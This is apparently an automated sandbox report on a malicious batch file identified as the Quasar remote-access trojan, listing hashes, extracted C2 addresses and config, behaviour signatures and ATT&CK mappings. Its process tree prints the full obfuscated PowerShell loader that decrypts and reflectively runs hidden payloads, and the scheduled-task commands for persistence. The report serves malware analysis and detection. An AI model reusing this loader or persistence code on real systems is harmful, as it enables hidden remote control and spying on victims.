Overview

overview

10

Static

static

1

Test.bat

windows7-x64

8

Test.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-06-2024 21:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Test.bat

  • Size

    1.6MB

  • MD5

    452333fe4f4b6b505f0b2fb6a2f550f0

  • SHA1

    8d609de9e202d5b99e20ec075ef65961477bdf61

  • SHA256

    d384c9523b0d235f5df58134611d0c3fa2047162f651e9febf24227663c56f70

  • SHA512

    98249d468a779a62e8e722505606990e122b724d938ad8082d3a1488abb7ae73b32d9735e189b5ed44e307bfa31f95ad961444afc8152cd7518efb8e3de59034

  • SSDEEP

    24576:ZYCKq2OwSobHA5C+sZ4JdhYJtko4J5AY36KpwoWGRGoeiLfZr3IhKkxOPyxg10dE:5KpbUdo0AK6oWeRhS8PvbR6C

Score
10/10
quasareyewalledexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Eyewalled

C2

147.185.221.18:18043

147.185.221.18:1358
Mutex

6b95b511-914b-4980-86c7-7ad1d68b1577

Attributes
  • encryption_key

    B6BC0F5C9047A1DA6D1D9CE2F9D4F673A7824410

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    Management

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Test.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3892
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KqxeXbfDGxuEH+7Gk9Wta61SYaVxTt4rEcHNX9Nuf8I='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kgFcU3INT6PSdo5B4jsRDg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VFHTQ=New-Object System.IO.MemoryStream(,$param_var); $nikKe=New-Object System.IO.MemoryStream; $wbesJ=New-Object System.IO.Compression.GZipStream($VFHTQ, [IO.Compression.CompressionMode]::Decompress); $wbesJ.CopyTo($nikKe); $wbesJ.Dispose(); $VFHTQ.Dispose(); $nikKe.Dispose(); $nikKe.ToArray();}function execute_function($param_var,$param2_var){ $VQCvn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VWTPJ=$VQCvn.EntryPoint; $VWTPJ.Invoke($null, $param2_var);}$OfkGU = 'C:\Users\Admin\AppData\Local\Temp\Test.bat';$host.UI.RawUI.WindowTitle = $OfkGU;$bFszc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($OfkGU).Split([Environment]::NewLine);foreach ($rtAAn in $bFszc) { if ($rtAAn.StartsWith(':: ')) { $AKwuR=$rtAAn.Substring(3); break; }}$payloads_var=[string[]]$AKwuR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4536
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_231_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_231.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2416
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_231.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1692
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_231.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1888
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KqxeXbfDGxuEH+7Gk9Wta61SYaVxTt4rEcHNX9Nuf8I='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kgFcU3INT6PSdo5B4jsRDg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VFHTQ=New-Object System.IO.MemoryStream(,$param_var); $nikKe=New-Object System.IO.MemoryStream; $wbesJ=New-Object System.IO.Compression.GZipStream($VFHTQ, [IO.Compression.CompressionMode]::Decompress); $wbesJ.CopyTo($nikKe); $wbesJ.Dispose(); $VFHTQ.Dispose(); $nikKe.Dispose(); $nikKe.ToArray();}function execute_function($param_var,$param2_var){ $VQCvn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VWTPJ=$VQCvn.EntryPoint; $VWTPJ.Invoke($null, $param2_var);}$OfkGU = 'C:\Users\Admin\AppData\Roaming\startup_str_231.bat';$host.UI.RawUI.WindowTitle = $OfkGU;$bFszc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($OfkGU).Split([Environment]::NewLine);foreach ($rtAAn in $bFszc) { if ($rtAAn.StartsWith(':: ')) { $AKwuR=$rtAAn.Substring(3); break; }}$payloads_var=[string[]]$AKwuR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:4800
            • C:\Windows\SYSTEM32\schtasks.exe
              "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\Management\Client.exe" /rl HIGHEST /f
              6⤵
              • Creates scheduled task(s)
              PID:4428

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Scheduled Task/Job

1
T1053

Persistence

Scheduled Task/Job

1
T1053

Privilege Escalation

Scheduled Task/Job

1
T1053

Defense Evasion

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    1cc5e033811a5d520bb4a6904b5c433b

    SHA1

    c159a342ed372790600b3a6ac97e274638a0ce9a

    SHA256

    9e20052dd29dfcd8220dcf271acd3e27f9d6b785d72531043741ef349b48c7a8

    SHA512

    dd8b57e50382a7a84aea3986c3ae8a38ade0fb84a5c9696339487022321be12f08aff9d47455a28137e31a8632cda2490dcf0332c6b3c72e7cfdd10e63e4f429

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eotbaqjv.yx4.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit
  • C:\Users\Admin\AppData\Roaming\startup_str_231.bat
    Filesize

    1.6MB

    MD5

    452333fe4f4b6b505f0b2fb6a2f550f0

    SHA1

    8d609de9e202d5b99e20ec075ef65961477bdf61

    SHA256

    d384c9523b0d235f5df58134611d0c3fa2047162f651e9febf24227663c56f70

    SHA512

    98249d468a779a62e8e722505606990e122b724d938ad8082d3a1488abb7ae73b32d9735e189b5ed44e307bfa31f95ad961444afc8152cd7518efb8e3de59034

    Download Submit
  • C:\Users\Admin\AppData\Roaming\startup_str_231.vbs
    Filesize

    115B

    MD5

    ad35a2d52931140002bfbe2b93b26d3b

    SHA1

    495ceac4ed41cfe31e9cca8221056868443ef282

    SHA256

    ff36e7628a85e2d2c731d572622f69607f0e152796c5ab2cfca418d3cfd817c9

    SHA512

    f70eaeb5fb396ff04a5fc9ee0901a0b2e4b5f41bf17e02a38b9e5f3dade67c6fc79353d2548db2cf81c160a49b5df2897efaca820ae68e1c9c69923fe060e871

    Download Submit
  • memory/2416-27-0x00007FFDB2D60000-0x00007FFDB3821000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/2416-30-0x00007FFDB2D60000-0x00007FFDB3821000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/2416-25-0x00007FFDB2D60000-0x00007FFDB3821000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/2416-26-0x00007FFDB2D60000-0x00007FFDB3821000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4536-13-0x000001671F770000-0x000001671F778000-memory.dmp
    Filesize

    32KB

    Download
  • memory/4536-14-0x0000016721C30000-0x0000016721D62000-memory.dmp
    Filesize

    1.2MB

    Download
  • memory/4536-0-0x00007FFDB2D63000-0x00007FFDB2D65000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4536-12-0x00007FFDB2D60000-0x00007FFDB3821000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4536-11-0x00007FFDB2D60000-0x00007FFDB3821000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4536-10-0x000001671F780000-0x000001671F7A2000-memory.dmp
    Filesize

    136KB

    Download
  • memory/4536-50-0x00007FFDB2D60000-0x00007FFDB3821000-memory.dmp
    Filesize

    10.8MB

    Download
  • memory/4800-49-0x000001E06D230000-0x000001E06D554000-memory.dmp
    Filesize

    3.1MB

    Download
  • memory/4800-51-0x000001E06DB40000-0x000001E06DB90000-memory.dmp
    Filesize

    320KB

    Download
  • memory/4800-52-0x000001E06DC50000-0x000001E06DD02000-memory.dmp
    Filesize

    712KB

    Download
  • memory/4800-53-0x000001E06E420000-0x000001E06E5E2000-memory.dmp
    Filesize

    1.8MB

    Download